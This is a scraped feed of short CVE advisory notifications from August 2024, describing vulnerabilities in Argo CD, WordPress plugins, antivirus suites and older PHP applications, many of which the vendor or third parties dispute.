🚨 CVE-2022-24904Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 0.7.0 and prior to versions 2.1.15m 2.2.9, and 2.3.4 is vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user with write access for a repository which is (or may be) used in a directory-type Application may commit a symlink which points to an out-of-bounds file. Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any JSON-formatted secrets which have been mounted as files on the repo-server. A patch for this vulnerability has been released in Argo CD versions 2.3.4, 2.2.9, and 2.1.15. Users of versions 2.3.0 or above who do not have any Jsonnet/directory-type Applications may disable the Jsonnet/directory config management tool as a workaround.🎖@cveNotify |
|
| 2024-08-07 16:07:38 |
🚨 CVE-2022-24768Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All unpatched versions of Argo CD starting with 1.0.0 are vulnerable to an improper access control bug, allowing a malicious user to potentially escalate their privileges to admin-level. Versions starting with 0.8.0 and 0.5.0 contain limited versions of this issue. To perform exploits, an authorized Argo CD user must have push access to an Application's source git or Helm repository or `sync` and `override` access to an Application. Once a user has that access, different exploitation levels are possible depending on their other RBAC privileges. A patch for this vulnerability has been released in Argo CD versions 2.3.2, 2.2.8, and 2.1.14. Some mitigation measures are available but do not serve as a substitute for upgrading. To avoid privilege escalation, limit who has push access to Application source repositories or `sync` + `override` access to Applications; and limit which repositories are available in projects where users have `update` access to Applications. To avoid unauthorized resource inspection/tampering, limit who has `delete`, `get`, or `action` access to Applications.🎖@cveNotify |
|
| 2024-08-07 16:07:37 |
🚨 CVE-2021-3557A flaw was found in argocd. Any unprivileged user is able to deploy argocd in their namespace and with the created ServiceAccount argocd-argocd-server, the unprivileged user is able to read all resources of the cluster including all secrets which might enable privilege escalations. The highest threat from this vulnerability is to data confidentiality.🎖@cveNotify |
|
| 2024-08-07 16:07:36 |
🚨 CVE-2022-24348Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file.🎖@cveNotify |
|
| 2024-08-07 16:07:32 |
🚨 CVE-2021-26924An issue was discovered in Argo CD before 1.8.4. Browser XSS protection is not activated due to the missing XSS protection header.🎖@cveNotify |
|
| 2024-08-07 16:07:31 |
🚨 CVE-2021-23347The package github.com/argoproj/argo-cd/cmd before 1.7.13, from 1.8.0 and before 1.8.6 are vulnerable to Cross-site Scripting (XSS) the SSO provider connected to Argo CD would have to send back a malicious error message containing JavaScript to the user.🎖@cveNotify |
|
| 2024-08-07 16:07:30 |
🚨 CVE-2021-26921In util/session/sessionmanager.go in Argo CD before 1.8.4, tokens continue to work even when the user account is disabled.🎖@cveNotify |
|
| 2024-08-07 16:07:26 |
🚨 CVE-2020-8828As of v1.5.0, the default admin password is set to the argocd-server pod name. For insiders with access to the cluster or logs, this issue could be abused for privilege escalation, as Argo has privileged roles. A malicious insider is the most realistic threat, but pod names are not meant to be kept secret and could wind up just about anywhere.🎖@cveNotify |
|
| 2024-08-07 16:07:25 |
🚨 CVE-2020-11576Fixed in v1.5.1, Argo version v1.5.0 was vulnerable to a user-enumeration vulnerability which allowed attackers to determine the usernames of valid (non-SSO) accounts because /api/v1/session returned 401 for an existing username and 404 otherwise.🎖@cveNotify |
|
| 2024-08-07 15:07:32 |
🚨 CVE-2024-34753Missing Authorization vulnerability in SoftLab Radio Player.This issue affects Radio Player: from n/a through 2.0.73.🎖@cveNotify |
|
| 2024-08-07 15:07:31 |
🚨 CVE-2024-32144Missing Authorization vulnerability in Welcart Inc. Welcart e-Commerce.This issue affects Welcart e-Commerce: from n/a through 2.9.14.🎖@cveNotify |
|
| 2024-08-07 15:07:30 |
🚨 CVE-2024-23521Missing Authorization vulnerability in Happyforms.This issue affects Happyforms: from n/a through 1.25.10.🎖@cveNotify |
|
| 2024-08-07 15:07:27 |
🚨 CVE-2023-52233Missing Authorization vulnerability in Post SMTP Post SMTP Mailer/Email Log.This issue affects Post SMTP Mailer/Email Log: from n/a through 2.8.6.🎖@cveNotify |
|
| 2024-08-07 15:07:26 |
🚨 CVE-2023-51682Missing Authorization vulnerability in ibericode MC4WP.This issue affects MC4WP: from n/a through 4.9.9.🎖@cveNotify |
|
| 2024-08-07 15:07:25 |
🚨 CVE-2023-52186Missing Authorization vulnerability in Woo WooCommerce Product Vendors.This issue affects WooCommerce Product Vendors: from n/a through 2.2.2.🎖@cveNotify |
|
| 2024-08-07 15:07:24 |
🚨 CVE-2023-33922Missing Authorization vulnerability in Elementor Elementor Website Builder.This issue affects Elementor Website Builder: from n/a through 3.13.2.🎖@cveNotify |
|
| 2024-08-07 14:37:43 |
🚨 CVE-2007-2997Multiple SQL injection vulnerabilities in cgi-bin/reorder2.asp in SalesCart Shopping Cart allow remote attackers to execute arbitrary SQL commands via the password field and other unspecified vectors. NOTE: the vendor disputes this issue, stating "We were able to reproduce this sql injection on an old out-of-date demo on the website but not on the released product.🎖@cveNotify |
|
| 2024-08-07 14:37:42 |
🚨 CVE-2007-2626SQL injection vulnerability in admin.php in SchoolBoard allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters. NOTE: CVE disputes this issue, because 'username' does not exist, and the password is not used in any queries🎖@cveNotify |
|
| 2024-08-07 14:37:41 |
🚨 CVE-2007-2558PHP remote file inclusion vulnerability in index.php in phpFullAnnu CMS (pfa CMS) 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the repinc parameter. NOTE: CVE disputes this issue since $repinc is set to a constant value before use🎖@cveNotify |
|
| 2024-08-07 14:37:38 |
🚨 CVE-2007-2534Multiple SQL injection vulnerabilities in admin.php in phpHoo3 allow remote attackers to execute arbitrary SQL commands via the (1) ADMIN_USER (USER) and (2) ADMIN_PASS (PASS) parameters during a login. NOTE: CVE disputes this vulnerability, since ADMIN_USER/ADMIN_PASS are initialized before use🎖@cveNotify |
|
| 2024-08-07 14:37:37 |
🚨 CVE-2007-2503Directory traversal vulnerability in turbulence.php in PHP Turbulence 0.0.1 alpha allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tcore] parameter. NOTE: this vulnerability is disputed by CVE and a reliable third party because a direct request to user/turbulence.php triggers a fatal error before inclusion🎖@cveNotify |
|
| 2024-08-07 14:37:36 |
🚨 CVE-2007-2477PHP remote file inclusion vulnerability in phpMyChat.php3 in phpMyChat 0.14.5 allows remote attackers to execute arbitrary PHP code via a URL in the {ChatPath} parameter. NOTE: this has been disputed by multiple third parties and CVE because $ChatPath is set to a constant value🎖@cveNotify |
|
| 2024-08-07 14:37:35 |
🚨 CVE-2007-2422Multiple PHP remote file inclusion vulnerabilities in Modules Builder (modbuild) 4.1 for Comdev One Admin allow remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter to (1) config-bak.php or (2) config.php. NOTE: CVE disputes this vulnerability because the unmodified scripts set the applicable variable to the empty string; reasonable modified copies would use a fixed pathname string🎖@cveNotify |
|
| 2024-08-07 14:37:31 |
🚨 CVE-2007-2412Directory traversal vulnerability in modules/file.php in Seir Anphin allows remote attackers to obtain sensitive information via a .. (dot dot) in the a[filepath] parameter. NOTE: a third party has disputed this issue because the a array is populated by a database query before use🎖@cveNotify |
|
| 2024-08-07 14:07:24 |
🚨 CVE-2024-36106Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It’s possible for authenticated users to enumerate clusters by name by inspecting error messages. It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters. This vulnerability is fixed in 2.11.3, 2.10.12, and 2.9.17.🎖@cveNotify |
|
| 2024-08-07 13:37:42 |
🚨 CVE-2007-1485Buffer overflow in the set_umask function in QFTP in LIBFtp 3.1-1 allows local users to execute arbitrary code via a long -m argument. NOTE: CVE disputes this issue because QFTP is not setuid, and it is unlikely that there are web interfaces to QFTP that would accept untrusted command line arguments🎖@cveNotify |
|
| 2024-08-07 13:37:41 |
🚨 CVE-2007-1456PHP remote file inclusion vulnerability in common.php in PHP Photo Album allows remote attackers to execute arbitrary PHP code via a URL in the db_file parameter. NOTE: CVE disputes this vulnerability, because versions 0.3.2.6 and 0.4.1beta do not contain this file. However, it is possible that the original researcher was referring to a different product🎖@cveNotify |
|
| 2024-08-07 13:37:37 |
🚨 CVE-2007-1052PHP remote file inclusion vulnerability in index.php in PBLang (PBL) 4.60 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the dbpath parameter, a different vector than CVE-2006-5062. NOTE: this issue has been disputed by a reliable third party for 4.65, stating that the dbpath variable is initialized in an included file that is created upon installation🎖@cveNotify |
|
| 2024-08-07 13:37:36 |
🚨 CVE-2007-0862PHP remote file inclusion vulnerability in index.php in gnopaste 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code via the GNP_REAL_PATH parameter. NOTE: CVE and a third party dispute this issue, since GNP_REAL_PATH is a constant, not a variable🎖@cveNotify |
|
| 2024-08-07 13:37:32 |
🚨 CVE-2007-0860Multiple PHP remote file inclusion vulnerabilities in local Calendar System 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the (1) TEMPLATE_DIR parameter to (a) showinvoices.php, (b) showmonth.php, (c) showevents.php, (d) retrieveinvoice.php, (e) modifyitem.php, and (f) lookup_userid.php; or the LIBDIR parameter to (g) editevent.php, (h) resetpassword.php, (i) signup.php, showmonth.php, (j) showday.php, showevents.php, and lookup_userid.php. NOTE: this issue has been disputed by a third party, who states that the associated variables are set in config.php before use🎖@cveNotify |
|
| 2024-08-07 13:37:31 |
🚨 CVE-2007-0830Multiple cross-site scripting (XSS) vulnerabilities in the Admin Control Panel (AdminCP) in Jelsoft vBulletin 3.6.4 allow remote authenticated administrators to inject arbitrary web script or HTML via unspecified vectors related to the (1) User Group Manager, (2) User Rank Manager, (3) User Title Manager, (4) BB Code Manager, (5) Attachment Manager, (6) Calendar Manager, and (7) Forums & Moderators functions. NOTE: the vendor disputes this issue, stating that modifying HTML is an intended privilege of an administrator. NOTE: it is possible that this issue overlaps CVE-2006-6040🎖@cveNotify |
|
| 2024-08-07 13:37:30 |
🚨 CVE-2007-0794SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions🎖@cveNotify |
|
| 2024-08-07 13:37:26 |
🚨 CVE-2007-0487PHP remote file inclusion vulnerability in index.php in FreeForum 0.9.0 allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter. NOTE: this issue has been disputed by third party researchers, stating that fpath variable is initialized before being used🎖@cveNotify |
|
| 2024-08-07 13:37:25 |
🚨 CVE-2007-0486Multiple PHP remote file inclusion vulnerabilities in Openads (aka phpAdsNew) 2.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the (1) phpAds_geoPlugin parameter to libraries/lib-remotehost.inc, the (2) filename parameter to admin/report-index, or the (3) phpAds_config[my_footer] parameter to admin/lib-gui.inc. NOTE: the vendor has disputed this issue, stating that the relevant variables are used within function definitions🎖@cveNotify |
|
| 2024-08-07 13:07:25 |
🚨 CVE-2024-3603The OSM – OpenStreetMap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'osm_map' shortcode in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping on user supplied attributes such as 'theme'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-07 13:07:24 |
🚨 CVE-2024-3563The Genesis Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sharing block in all versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-07 12:37:32 |
🚨 CVE-2007-0189PHP remote file inclusion vulnerability in index.php in GeoBB Georgian Bulletin Board allows remote attackers to execute arbitrary PHP code via a URL in the action parameter. NOTE: CVE disputes this issue, since GeoBB 1.0 sets $action to a whitelisted value🎖@cveNotify |
|
| 2024-08-07 12:37:26 |
🚨 CVE-2007-0087Microsoft Internet Information Services (IIS), when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal🎖@cveNotify |
|
| 2024-08-07 12:37:25 |
🚨 CVE-2007-0080Buffer overflow in the SMB_Connect_Server function in FreeRadius 1.1.3 and earlier allows attackers to execute arbitrary code related to the server desthost field of an SMB_Handle_Type instance. NOTE: the impact of this issue has been disputed by a reliable third party and the vendor, who states that exploitation is limited "only to local administrators who have write access to the server configuration files." CVE concurs with the dispute🎖@cveNotify |
|
| 2024-08-07 12:37:24 |
🚨 CVE-2007-0050PHP remote file inclusion vulnerability in index.php in OpenPinboard 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the language parameter. NOTE: this issue has been disputed by the developer and a third party, since the variable is set before use. CVE analysis suggests that there is a small time window of risk before the installation is complete🎖@cveNotify |
|
| 2024-08-07 11:37:36 |
🚨 CVE-2024-7266Incorrect User Management vulnerability in Naukowa i Akademicka Sieć Komputerowa - Państwowy Instytut Badawczy EZD RP allows logged-in user to list all users in the system, including those from other organizations. This issue affects EZD RP: from 15 before 15.84, from 16 before 16.15, from 17 before 17.2.🎖@cveNotify |
|
| 2024-08-07 11:37:35 |
🚨 CVE-2008-5749Argument injection vulnerability in Google Chrome 1.0.154.36 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. NOTE: a third party disputes this issue, stating that Chrome "will ask for user permission" and "cannot launch the applet even [if] you have given out the permission.🎖@cveNotify |
|
| 2024-08-07 11:37:31 |
🚨 CVE-2008-5186The set_language_path function in geshi.php in Generic Syntax Highlighter (GeSHi) before 1.0.8.1 might allow remote attackers to conduct file inclusion attacks via crafted inputs that influence the default language path ($path variable). NOTE: this issue has been disputed by a vendor, stating that only a static value is used, so this is not a vulnerability in GeSHi. Separate CVE identifiers would be created for web applications that integrate GeSHi in a way that allows control of the default language path🎖@cveNotify |
|
| 2024-08-07 11:37:30 |
🚨 CVE-2008-5034master-filter in printfilters-ppd 2.13 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/filter.debug temporary file. NOTE: the vendor disputes this vulnerability, stating 'this package does not have " possibility of attack with the help of symlinks"'🎖@cveNotify |
|
| 2024-08-07 11:37:29 |
🚨 CVE-2008-4998postinst in twiki 4.1.2 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/twiki temporary file. NOTE: the vendor disputes this vulnerability, stating "this bug is invalid.🎖@cveNotify |
|
| 2024-08-07 11:37:26 |
🚨 CVE-2008-4997dfxml-invoice in datafreedom-perl 0.1.7 allows local users to overwrite arbitrary files via a symlink attack on the /tmp/zenity temporary file. NOTE: the vendor disputes this vulnerability, stating that the vector is solely "an EXAMPLE used in the manpage.🎖@cveNotify |
|
| 2024-08-07 11:37:25 |
🚨 CVE-2008-4953firehol in firehol 1.256 allows local users to overwrite arbitrary files via a symlink attack on (1) /tmp/.firehol-tmp-#####-*-* and (2) /tmp/firehol.conf temporary files. NOTE: the vendor disputes this vulnerability, stating that an attack "would require an attacker to create 1073741824*PID-RANGE symlinks.🎖@cveNotify |
|
| 2024-08-07 11:37:24 |
🚨 CVE-2008-4950gccross in dpkg-cross 2.3.0 allows local users to overwrite arbitrary files via a symlink attack on the tmp/gccross2.log temporary file. NOTE: the vendor disputes this vulnerability, stating that "There is no sense in this bug - the script ... is called under specific cross-building environments within a chroot.🎖@cveNotify |
|
| 2024-08-07 10:37:25 |
🚨 CVE-2008-4301A certain ActiveX control in iisext.dll in Microsoft Internet Information Services (IIS) allows remote attackers to set a password via a string argument to the SetPassword method. NOTE: this issue could not be reproduced by a reliable third party. In addition, the original researcher is unreliable. Therefore the original disclosure is probably erroneous🎖@cveNotify |
|
| 2024-08-07 10:37:24 |
🚨 CVE-2008-2956Memory leak in Pidgin 2.0.0, and possibly other versions, allows remote attackers to cause a denial of service (memory consumption) via malformed XML documents. NOTE: this issue has been disputed by the upstream vendor, who states: "I was never able to identify a scenario under which a problem occurred and the original reporter wasn't able to supply any sort of reproduction details."🎖@cveNotify |
|
| 2024-08-07 09:37:30 |
🚨 CVE-2024-5290An issue was discovered in Ubuntu wpa_supplicant that resulted in loading of arbitrary shared objects, which allows a local unprivileged attacker to escalate privileges to the user that wpa_supplicant runs as (usually root).Membership in the netdev group or access to the dbus interface of wpa_supplicant allow an unprivileged user to specify an arbitrary path to a module to be loaded by the wpa_supplicant process; other escalation paths might exist.🎖@cveNotify |
|
| 2024-08-07 09:37:26 |
🚨 CVE-2008-1964Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf.c in xine-lib allows remote attackers to have an unknown impact via a long copyright field in an NSF header in an NES Sound file, a different issue than CVE-2008-1878. NOTE: a third party claims that the copyright field always has a safe length🎖@cveNotify |
|
| 2024-08-07 09:37:25 |
🚨 CVE-2008-1467CenterIM 4.22.3 and earlier allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a URI, related to "received URLs in the message window." NOTE: this issue has been disputed due to the user-assisted nature, since the URL must be selected and launched by the victim🎖@cveNotify |
|
| 2024-08-07 09:37:24 |
🚨 CVE-2008-1246The Cisco PIX/ASA Finesse Operation System 7.1 and 7.2 allows local users to gain privileges by entering characters at the enable prompt, erasing these characters via the Backspace key, and then holding down the Backspace key for one second after erasing the final character. NOTE: third parties, including one who works for the vendor, have been unable to reproduce the flaw unless the enable password is blank🎖@cveNotify |
|
| 2024-08-07 08:37:30 |
🚨 CVE-2024-42062CloudStack account-users by default use username and password based authentication for API and UI access. Account-users can generate and register randomised API and secret keys and use them for the purpose of API-based automation and integrations. Due to an access permission validation issue that affects Apache CloudStack versions 4.10.0 up to 4.19.1.0, domain admin accounts were found to be able to query all registered account-users API and secret keys in an environment, including that of a root admin. An attacker who has domain admin access can exploit this to gain root admin and other-account privileges and perform malicious operations that can result in compromise of resources integrity and confidentiality, data loss, denial of service and availability of CloudStack managed infrastructure.Users are recommended to upgrade to Apache CloudStack 4.18.2.3 or 4.19.1.1, or later, which addresses this issue. Additionally, all account-user API and secret keys should be regenerated.🎖@cveNotify |
|
| 2024-08-07 08:37:29 |
🚨 CVE-2009-5064ldd in the GNU C Library (aka glibc or libc6) 2.13 and earlier allows local users to gain privileges via a Trojan horse executable file linked with a modified loader that omits certain LD_TRACE_LOADED_OBJECTS checks. NOTE: the GNU C Library vendor states "This is just nonsense. There are a gazillion other ways to introduce code if people are downloading arbitrary binaries and install them in appropriate directories or set LD_LIBRARY_PATH etc.🎖@cveNotify |
|
| 2024-08-07 08:37:26 |
🚨 CVE-2009-4996Xfce4-session 4.5.91 in Xfce does not lock the screen when the suspend or hibernate button is pressed, which might make it easier for physically proximate attackers to access an unattended laptop via a resume action, a related issue to CVE-2010-2532. NOTE: there is no general agreement that this is a vulnerability, because separate control over locking can be an equally secure, or more secure, behavior in some threat environments🎖@cveNotify |
|
| 2024-08-07 08:37:25 |
🚨 CVE-2008-0820Cross-site scripting (XSS) vulnerability in index.php in Etomite 0.6.1.4 Final allows remote attackers to inject arbitrary web script or HTML via $_SERVER['PHP_INFO']. NOTE: the vendor disputes this issue in a followup, stating that the affected variable is $_SERVER['PHP_SELF'], and "This is not an Etomite specific exploit and I would like the report rescinded.🎖@cveNotify |
|
| 2024-08-07 08:37:24 |
🚨 CVE-2008-0560PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms (contactforms), a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a fatal error due to a call to an undefined function🎖@cveNotify |
|
| 2024-08-07 07:37:25 |
🚨 CVE-2009-4488Varnish 2.0.6 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator. NOTE: the vendor disputes the significance of this report, stating that "This is not a security problem in Varnish or any other piece of software which writes a logfile. The real problem is the mistaken belief that you can cat(1) a random logfile to your terminal safely.🎖@cveNotify |
|
| 2024-08-07 07:37:24 |
🚨 CVE-2009-3559main/streams/plain_wrapper.c in PHP 5.3.x before 5.3.1 does not recognize the safe_mode_include_dir directive, which allows context-dependent attackers to have an unknown impact by triggering the failure of PHP scripts that perform include or require operations, as demonstrated by a script that attempts to perform a require_once on a file in a standard library directory. NOTE: a reliable third party reports that this is not a vulnerability, because it results in a more restrictive security policy.🎖@cveNotify |
|
| 2024-08-07 06:37:25 |
🚨 CVE-2009-2936The Command Line Interface (aka Server CLI or administration interface) in the master process in the reverse proxy server in Varnish before 2.1.0 does not require authentication for commands received through a TCP port, which allows remote attackers to (1) execute arbitrary code via a vcl.inline directive that provides a VCL configuration file containing inline C code; (2) change the ownership of the master process via param.set, stop, and start directives; (3) read the initial line of an arbitrary file via a vcl.load directive; or (4) conduct cross-site request forgery (CSRF) attacks that leverage a victim's location on a trusted network and improper input validation of directives. NOTE: the vendor disputes this report, saying that it is "fundamentally misguided and pointless.🎖@cveNotify |
|
| 2024-08-07 06:37:24 |
🚨 CVE-2009-2653The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.🎖@cveNotify |
|
| 2024-08-07 05:37:32 |
🚨 CVE-2009-1227NOTE: this issue has been disputed by the vendor. Buffer overflow in the PKI Web Service in Check Point Firewall-1 PKI Web Service allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) Authorization or (2) Referer HTTP header to TCP port 18624. NOTE: the vendor has disputed this issue, stating "Check Point Security Alert Team has analyzed this report. We've tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs. The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack. We consider this attack to pose no risk to Check Point customers." In addition, the original researcher, whose reliability is unknown as of 20090407, also states that the issue "was discovered during a pen-test where the client would not allow further analysis.🎖@cveNotify |
|
| 2024-08-07 05:37:26 |
🚨 CVE-2009-0380SQL injection vulnerability in the Sigsiu Online Business Index 2 (SOBI2, com_sobi2) RC 2.8.2 component for Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the bid parameter in a showbiz action to index.php, a different vector than CVE-2008-0607. NOTE: CVE disputes this issue, since neither "showbiz" nor "bid" appears in the source code for SOBI2🎖@cveNotify |
|
| 2024-08-07 05:37:25 |
🚨 CVE-2009-0127M2Crypto does not properly check the return value from the OpenSSL EVP_VerifyFinal, DSA_verify, ECDSA_verify, DSA_do_verify, and ECDSA_do_verify functions, which might allow remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature, a similar vulnerability to CVE-2008-5077. NOTE: a Linux vendor disputes the relevance of this report to the M2Crypto product because "these functions are not used anywhere in m2crypto.🎖@cveNotify |
|
| 2024-08-07 05:37:24 |
🚨 CVE-2009-0125NOTE: this issue has been disputed by the upstream vendor. nasl/nasl_crypto2.c in the Nessus Attack Scripting Language library (aka libnasl) 2.2.11 does not properly check the return value from the OpenSSL DSA_do_verify function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature, a similar vulnerability to CVE-2008-5077. NOTE: the upstream vendor has disputed this issue, stating "while we do misuse this function (this is a bug), it has absolutely no security ramification.🎖@cveNotify |
|
| 2024-08-07 04:37:42 |
🚨 CVE-2010-5163Race condition in Kaspersky Internet Security 2010 9.0.0.736 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:41 |
🚨 CVE-2010-5161Race condition in F-Secure Internet Security 2010 10.00 build 246 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:40 |
🚨 CVE-2010-5160Race condition in ESET Smart Security 4.2.35.3 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:37 |
🚨 CVE-2010-5159Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:36 |
🚨 CVE-2010-5156Race condition in CA Internet Security Suite Plus 2010 6.0.0.272 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:35 |
🚨 CVE-2010-5154Race condition in BitDefender Total Security 2010 13.0.20.347 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:32 |
🚨 CVE-2010-5153Race condition in Avira Premium Security Suite 10.0.0.536 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:31 |
🚨 CVE-2010-5151Race condition in avast! Internet Security 5.0.462 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-08-07 04:37:30 |
🚨 CVE-2010-5096Multiple SQL injection vulnerabilities in MyBB (aka MyBulletinBoard) before 1.6.1 allow remote attackers to execute arbitrary SQL commands via the keywords parameter in a (1) do_search action to search.php or (2) do_stuff action to private.php. NOTE: the vendor disputes this issue, saying "Although this doesn't lead to an SQL injection, it does provide a general MyBB SQL error.🎖@cveNotify |
|
| 2024-08-07 04:37:26 |
🚨 CVE-2010-4634Directory traversal vulnerability in osTicket 1.6 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter to module.php, a different vector than CVE-2005-1439. NOTE: this issue has been disputed by a reliable third party🎖@cveNotify |
|
| 2024-08-07 04:37:25 |
🚨 CVE-2010-4121The TCP-to-ODBC gateway in IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.3 does not require authentication for SQL statements, which allows remote attackers to modify, create, or read database records via a session on TCP port 2020. NOTE: the vendor disputes this issue, stating that the "default Microsoft Access database is not password protected because it is intended to be used for evaluation purposes only.🎖@cveNotify |
|
| 2024-08-07 03:37:25 |
🚨 CVE-2010-3387vdrleaktest in Video Disk Recorder (VDR) 1.6.0 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory. NOTE: a third party disputes this issue because the script erroneously uses a semicolon in a context where a colon was intended🎖@cveNotify |
|
| 2024-08-07 03:37:24 |
🚨 CVE-2010-2532lxsession-logout in lxsession in LXDE, as used on SUSE openSUSE 11.3 and other platforms, does not lock the screen when the Suspend or Hibernate button is pressed, which might make it easier for physically proximate attackers to access an unattended laptop via a resume action. NOTE: there is no general agreement that this is a vulnerability, because separate control over locking can be an equally secure, or more secure, behavior in some threat environments.🎖@cveNotify |
|
| 2024-08-07 02:37:32 |
🚨 CVE-2024-34609Improper access control in VoiceNoteService prior to SMR Aug-2024 Release 1 allows local attackers to bypass restrictions on starting services from the background.🎖@cveNotify |
|
| 2024-08-07 02:37:26 |
🚨 CVE-2024-34608Improper access control in PaymentManagerService prior to SMR Aug-2024 Release 1 allows local attackers to bypass restrictions on starting services from the background.🎖@cveNotify |
|
| 2024-08-07 02:37:25 |
🚨 CVE-2024-34605Improper access control in SamsungHealthService prior to SMR Aug-2024 Release 1 allows local attackers to bypass restrictions on starting services from the background.🎖@cveNotify |
|
| 2024-08-07 02:37:24 |
🚨 CVE-2024-34604Improper access control in LedCoverService prior to SMR Aug-2024 Release 1 allows local attackers to bypass restrictions on starting services from the background.🎖@cveNotify |
|
